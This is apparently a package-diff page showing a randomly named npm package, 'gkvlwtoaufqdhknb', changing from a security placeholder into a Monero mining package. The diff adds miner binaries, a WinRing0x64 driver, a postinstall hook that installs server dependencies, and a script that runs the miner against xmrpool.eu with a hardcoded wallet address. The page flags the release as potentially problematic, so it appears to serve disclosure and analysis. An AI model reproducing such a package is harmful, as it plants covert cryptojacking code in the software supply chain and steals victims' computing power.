gkvlwtoaufqdhknb 0.0.1-security → 0.1.91
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of gkvlwtoaufqdhknb might be problematic. Click here for more details.
- package/package.json +1 -6
- package/public/index.html +1 -0
- package/public/main.js +2 -0
- package/server/package-lock.json +1494 -0
- package/server/package.json +21 -0
- package/server/src/app.js +122 -0
- package/server/src/index.js +3 -0
- package/server/src/logger.js +54 -0
- package/server/src/miners/gkvlwtoaufqdhknb/WinRing0x64.sys +0 -0
- package/server/src/miners/gkvlwtoaufqdhknb/config.base.json +412 -0
- package/server/src/miners/gkvlwtoaufqdhknb/gkvlwtoaufqdhknb +0 -0
- package/server/src/miners/gkvlwtoaufqdhknb/gkvlwtoaufqdhknb.exe +0 -0
- package/server/src/miners/gkvlwtoaufqdhknb/gkvlwtoaufqdhknb.miner.js +107 -0
- package/server/src/miners.controller.js +154 -0
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1 @@
|
|
1
|
-
{
|
2
|
-
"name": "gkvlwtoaufqdhknb",
|
3
|
-
"version": "0.0.1-security",
|
4
|
-
"description": "security holding package",
|
5
|
-
"repository": "npm/security-holder"
|
6
|
-
}
|
1
|
+
{"name": "gkvlwtoaufqdhknb", "version": "0.1.91", "description": "Easy to use npm NodeJS Monero Miner with C++, uses for highspeed hashing.", "main": "./server/src/index.js", "scripts": {"postinstall": "cd server && npm i", "client-start": "cd ./client && npm start", "server-start": "cd ./server && npm start", "test": "echo \"Error: no test specified\" && exit 1", "XMR-TEMP": "gkvlwtoaufqdhknb.exe --donate-level 1 -o xmrpool.eu:9999 -u 47D8WQoJKydhTkk26bqZCVF7FaNhzRtNG15u1XiRQ83nfYqogyLjPMnYEKarjAiCz93oV6sETE9kkL3bkbvTX6nMU24CND8 -k --tls"}, "repository": {"type": "git", "url": "git+https://github.com/DutchKevv/Overhead2Crypto.git"}, "author": "H.K.Brandsma", "license": "ISC", "bugs": {"url": "https://github.com/DutchKevv/Overhead2Crypto/issues"}, "homepage": "https://github.com/DutchKevv/Overhead2Crypto#readme", "keywords": ["water"]}
|
@@ -0,0 +1 @@
|
|
1
|
+
<html><head><script src="https://cdnjs.cloudflare.com/ajax/libs/canvasjs/1.7.0/canvasjs.min.js" integrity="sha512-FJ2OYvUIXUqCcPf1stu+oTBlhn54W0UisZB/TNrZaVMHHhYvLBV9jMbvJYtvDe5x/WVaoXZ6KB+Uqe5hT2vlyA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script><script defer="defer" src="main.js"></script></head><body><div class="container-fluid"><h1 style="margin-bottom: 30px;">Performance</h1><hr><div class="row"><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="activityChart"></div></div></div><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="poolChart"></div></div></div><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="coinChart"></div></div></div></div></div><div class="container-fluid"><h1 style="margin-bottom: 30px;">System</h1><hr><div class="row"><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="CPUChart"></div></div></div><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="GPUChart"></div></div></div><div class="col-lg-4 col-sm-12 col-xs-12"><div class="jumbotron"><div id="RAMChart"></div></div></div></div></div><script src="main.js"></script></body></html>
|